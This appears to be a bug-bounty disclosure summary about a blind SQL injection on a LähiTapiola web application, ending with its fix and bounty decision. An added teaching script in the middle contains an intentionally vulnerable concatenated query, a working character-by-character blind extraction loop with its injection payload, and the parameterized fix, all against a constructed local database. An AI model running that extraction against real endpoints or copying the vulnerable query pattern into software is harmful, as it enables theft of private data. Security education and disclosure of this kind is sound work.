LocalTapiola: SQL Injection on /webApp/lapsuudenturva (viestinta.lahitapiola.fi)

2017-01-21T14:56:00
ID H1:200214
Type hackerone
Reporter 3p1c
Modified 2017-02-10T21:04:08

Description

Issue

The reporter found a blind SQL injection vulnerability in an application hosted on viestinta.lahitapiola.fi (the /webApp/lapsuudenturva endpoint named in the title).
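As an added illustration of the vulnerability class named above, and not the lapsuudenturva application's own code (the report does not disclose its query or stack), the following Python script shows a query built by string concatenation, a boolean-based blind probe that extracts data from it one character at a time using only the endpoint's yes/no answer, and the parameterized form of the same query that closes the hole. The tables, column names, endpoint functions and the extracted value are all constructed for the example.

```python
"""Boolean-based blind SQL injection against a string-built query, next to the
parameterized form that closes it.  Added example only: the schema, data and
endpoint functions below are constructed and do not describe the real application."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "Lapsuudenturva", 1), (2, "Draft", 0)])
    conn.execute("INSERT INTO customers VALUES (1, 'ana@example.invalid')")
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, article_id: str) -> bool:
    """Hypothetical endpoint that concatenates user input into SQL.  The caller
    only learns whether a row came back; errors are swallowed, which is exactly
    what makes the injection 'blind' rather than error-based."""
    sql = "SELECT id FROM articles WHERE published = 1 AND id = " + article_id
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def lookup_fixed(conn: sqlite3.Connection, article_id: str) -> bool:
    """Same endpoint with a bound parameter: the input is treated as data,
    never parsed as SQL, and anything that is not an integer is rejected."""
    try:
        id_value = int(article_id)
    except ValueError:
        return False
    sql = "SELECT id FROM articles WHERE published = 1 AND id = ?"
    return conn.execute(sql, (id_value,)).fetchone() is not None


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Recover the first row of `subquery` one character at a time by asking the
    endpoint yes/no questions.  `oracle` takes the id string the endpoint would
    receive and returns True when a row is found, as the endpoint does.
    Against a parameterized endpoint every probe is rejected and '' comes back."""
    result = ""
    for pos in range(1, max_len + 1):
        found = False
        for code in range(32, 127):  # printable ASCII; widen for other data
            # unicode(substr(...)) is NULL past the end of the string, so the
            # comparison fails for every code and extraction stops cleanly.
            payload = f"1 AND unicode(substr(({subquery}),{pos},1))={code}"
            if oracle(payload):
                result += chr(code)
                found = True
                break
        if not found:
            break
    return result


if __name__ == "__main__":
    db = make_db()
    target = "SELECT email FROM customers LIMIT 1"
    print("vulnerable:", blind_extract(lambda p: lookup_vulnerable(db, p), target))
    print("fixed:     ", repr(blind_extract(lambda p: lookup_fixed(db, p), target)))
```

The probe never sees the customers table directly; it only observes whether the article lookup succeeds, which is why a "harmless" public endpoint can leak data from every table the database user can read. The fix is the bound parameter, not input filtering.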

Fix

The issue was investigated and found to be valid. The fix was to remove the application, as it was no longer needed.

Reasoning

The reported case was valid and within the scope of the bug bounty program. The issue was fixed and the reporter was awarded a bounty. The report shows that the whole life cycle of an application must be considered, and special care must be taken to ensure that outdated and unnecessary applications are decommissioned in a timely manner.

We have found that the underlying infrastructure and database contained a limited set of non-public customer-related information. For this reason, we have decided to award this report a one-time additional bonus, awarded in #200214. Fairness and transparency are key in a successful bug bounty program.